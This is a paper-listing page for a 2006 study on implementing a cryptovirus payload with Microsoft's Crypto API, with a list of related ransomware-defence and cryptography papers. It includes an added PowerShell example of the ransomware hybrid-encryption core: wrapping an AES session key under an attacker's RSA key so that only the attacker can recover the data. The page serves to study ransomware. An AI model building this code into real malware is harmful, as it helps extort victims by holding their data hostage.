Cryptoviral extortion using Microsoft's Crypto API

  • Adam L. Young
  • Published 1 April 2006
  • Computer Science
  • International Journal of Information Security
This paper presents the experimental results that were obtained by implementing the payload of a cryptovirus on the Microsoft Windows platform. The attack is based entirely on the Microsoft Cryptographic API and the needed API calls are covered in detail. More specifically, it is shown that by using eight types of API calls and 72 lines of C code, the payload can hybrid encrypt sensitive data and hold it hostage. Benchmarks are also given. A novel countermeasure against cryptoviral extortion…
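Added example (the editor's, not code from the paper): the hybrid-encryption structure the abstract describes, written in PowerShell against .NET's RSACryptoServiceProvider and Aes classes rather than the paper's C CryptoAPI calls. The CryptoAPI analogue noted beside each step is the editor's mapping; the key sizes, the OAEP padding choice, the function names and the sample plaintext are assumptions, not details taken from the paper.

```powershell
# Editor's added example, not the paper's code. Three roles: the attacker generates a key
# pair offline, the payload hybrid-encrypts data on the victim host, and only the attacker's
# private key can undo it. RSACryptoServiceProvider wraps CryptoAPI on Windows, so the
# comments give the CryptoAPI call each step corresponds to (editor's mapping).

# Attacker side, once, offline. Only the public half is embedded in the payload.
function New-AttackerKeyPair {
    $rsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new(2048)   # CryptGenKey(AT_KEYEXCHANGE)
    return @{
        Public  = $rsa.ExportParameters($false)    # CryptExportKey(PUBLICKEYBLOB)
        Private = $rsa.ExportParameters($true)     # never leaves the attacker
    }
}

# Payload side: random session key for the bulk data, session key wrapped under the
# attacker's public key, plaintext key material discarded.
function Invoke-HybridEncrypt {
    param(
        [byte[]]$Plaintext,
        [System.Security.Cryptography.RSAParameters]$AttackerPublic
    )
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 256
    $aes.GenerateKey()                              # CryptGenKey(CALG_AES_256, CRYPT_EXPORTABLE)
    $aes.GenerateIV()                               # CryptGenRandom for the IV
    $encryptor  = $aes.CreateEncryptor()
    $ciphertext = $encryptor.TransformFinalBlock($Plaintext, 0, $Plaintext.Length)   # CryptEncrypt

    $rsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new()
    $rsa.ImportParameters($AttackerPublic)          # CryptImportKey(PUBLICKEYBLOB)
    $wrappedKey = $rsa.Encrypt($aes.Key, $true)     # CryptExportKey(SIMPLEBLOB) under the public key; OAEP here
    $iv = $aes.IV

    $encryptor.Dispose(); $aes.Dispose(); $rsa.Dispose()   # CryptDestroyKey / CryptReleaseContext
    # After this point the victim host holds the session key only inside $wrappedKey.
    return @{ Ciphertext = $ciphertext; WrappedKey = $wrappedKey; IV = $iv }
}

# Attacker side, after payment: unwrap the session key with the private half and decrypt.
function Invoke-HybridDecrypt {
    param(
        [hashtable]$Bundle,
        [System.Security.Cryptography.RSAParameters]$AttackerPrivate
    )
    $rsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new()
    $rsa.ImportParameters($AttackerPrivate)
    $sessionKey = $rsa.Decrypt($Bundle.WrappedKey, $true)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $sessionKey
    $aes.IV  = $Bundle.IV
    $decryptor = $aes.CreateDecryptor()
    $plain = $decryptor.TransformFinalBlock($Bundle.Ciphertext, 0, $Bundle.Ciphertext.Length)
    $decryptor.Dispose(); $aes.Dispose(); $rsa.Dispose()
    return $plain
}

# Constructed demo input (not from the paper).
$keys   = New-AttackerKeyPair
$text   = 'constructed hostage data: Q3 payroll export'
$secret = [System.Text.Encoding]::UTF8.GetBytes($text)
$bundle = Invoke-HybridEncrypt -Plaintext $secret -AttackerPublic $keys.Public

# Victim-side check: the artifacts plus the embedded public key do not yield the session key.
$victimRsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new()
$victimRsa.ImportParameters($keys.Public)
try {
    [void]$victimRsa.Decrypt($bundle.WrappedKey, $true)
    'unexpected: session key unwrapped without the private key'
} catch {
    "victim cannot unwrap the session key: $($_.Exception.GetType().Name)"
}

# Attacker-side recovery: the private half is the only route back to the plaintext.
$recovered = Invoke-HybridDecrypt -Bundle $bundle -AttackerPrivate $keys.Private
if ([System.Text.Encoding]::UTF8.GetString($recovered) -eq $text) {
    'plaintext recovered with the attacker private key'
}
```

Runs in Windows PowerShell 5.1 or PowerShell 7 on Windows. In CryptoAPI the wrapping step is CryptExportKey of the session key as a SIMPLEBLOB under the public key handle, which uses PKCS#1 v1.5 padding unless CRYPT_OAEP is passed; the .NET call above uses OAEP. The step that the citing work on deterministic random bit generators (listed below) attacks is the GenerateKey() call: if the generator behind it can be replayed, the wrapped key stops being the only route to the plaintext.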

An Implementation of Cryptoviral Extortion Using Microsoft's Crypto API
This chapter presents an experimental implementation of cryptoviral extortion, an attack that we devised and presented at the 1996 IEEE Symposium on Security & Privacy [16] and that was recently…
An Implementation of Ransomware Malicious Software in Python
This paper presents an approach to developing ransomware in the Python programming language that employs Nmap to determine whether the SSH port is open and, if it is, enters the victim via the SSH protocol.
Overinfection in Ransomware
It is shown that the overinfection in ransomware can have four levels: Level 0 to ensure that the ransomware is not executed twice at the same time on the same machine, Level 1 to avoid re-encrypting its encrypted files, Level 2 to coordinate between its infections on the same machine and Level 3 to manage the infection between many target machines in the same computer park.
PayBreak: Defense Against Cryptographic Ransomware
The approach, prototype implementation, and evaluation of a novel, automated, and most importantly proactive defense mechanism against ransomware, called PayBreak, which effectively combats ransomware and keeps victims' files safe.
Vulnerability Analysis on the CNG Crypto Library
  • Kyungroul Lee, I. You, Kangbin Yim
  • Computer Science
  • 2015 9th International Conference on Innovative Mobile and Internet Services in Ubiquitous Computing
  • 2015
To prove the found vulnerability of CNG, a proof-of-concept tool is implemented based on the details of the vulnerability, and a countermeasure is proposed to improve security criteria so that various applications can fully take advantage of the CNG library.
Ransomware Analysis and Defense-WannaCry and the Win32 environment
To better understand the inner workings of this high-profile ransomware, a sample of WannaCry is obtained and the malware is dissected completely using advanced static and dynamic malware analysis techniques to enable cyber security experts to better thwart similar attacks in the future.
A 0-Day Aware Crypto-Ransomware Early Behavioral Detection Framework
This paper puts forward an efficient and effective framework for building crypto-ransomware early detection models that protect users, whether individuals or organizations, from being victimized by such attacks.
Dynamic ransomware protection using deterministic random bit generator
A dynamic ransomware protection method that replaces the random number generator of the OS with a user-defined generator is proposed, and it is possible to recover an infected file system by reproducing the keys the attacker used to perform the encryption.
Security Issues on the CNG Cryptography Library (Cryptography API: Next Generation)
Current security issues of CNG and the related considerations on it are introduced, and research on security assurance is strongly required in the environment of distributing and utilizing the CNG library.
Ransomware's Early Mitigation Mechanisms
A graph-based ransomware countermeasure to detect malicious threads is presented, a new mechanism that doesn't rely on previously used metrics in the literature to detect ransomware such as Shannon's entropy or system calls.


Building a Cryptovirus Using Microsoft's Cryptographic API
It is shown that by using 8 types of API calls and 72 lines of ANSI C code, the payload can hybrid encrypt sensitive data and hold it hostage on the host computer system.
Cryptovirology: extortion-based security threats and countermeasures
The idea of Cryptovirology is presented, which employs a twist on cryptography, showing that it can be used offensively to mount extortion based attacks that cause loss of access to information, loss of confidentiality, and information leakage, tasks which cryptography typically prevents.
A method for obtaining digital signatures and public-key cryptosystems
An encryption method is presented with the novel property that publicly revealing an encryption key does not thereby reveal the corresponding decryption key, so couriers or other secure means are not needed to transmit keys.
Optimal Asymmetric Encryption
A slightly enhanced scheme is shown to have the property that the adversary can create ciphertexts only of strings for which she "knows" the corresponding plaintexts; such a scheme is not only semantically secure but also non-malleable and secure against chosen-ciphertext attack.
A Practical Mix
We introduce a robust and efficient mix-network for exponentiation, and use it to obtain a threshold decryption mix-network for ElGamal encrypted messages, in which mix servers do not need to trust…
Untraceable electronic mail, return addresses, and digital pseudonyms
A technique based on public key cryptography is presented that allows an electronic mail system to hide who a participant communicates with as well as the content of the communication, in spite of…
How Much Security Is Enough to Stop a Thief?: The Economics of Outsider Theft via Computer Systems and Networks
We address the question of how much security is required to protect a packaged system, installed in a large number of organizations, from thieves who would exploit a single vulnerability to attack…
Mixing E-mail with Babel
  • Ceki Gülcü, G. Tsudik
  • Computer Science
  • Proceedings of Internet Society Symposium on Network and Distributed Systems Security
  • 1996
An attempt is made to formalize and quantify certain dimensions of anonymity and untraceable communication in general, and the design and salient features of the Babel anonymous remailer are introduced.
Almost entirely correct mixing with applications to voting
In order to design an exceptionally efficient mix network, both asymptotically and in real terms, the notion of almost entirely correct mixing is developed, and a new mix network is proposed that is almost entirely correct.
Announcing Approval of Federal Information Processing Standard (FIPS) 180-2, Secure Hash Standard; a Revision of FIPS 180-1
  • Federal Register 67(165), 54785–54787
  • 2002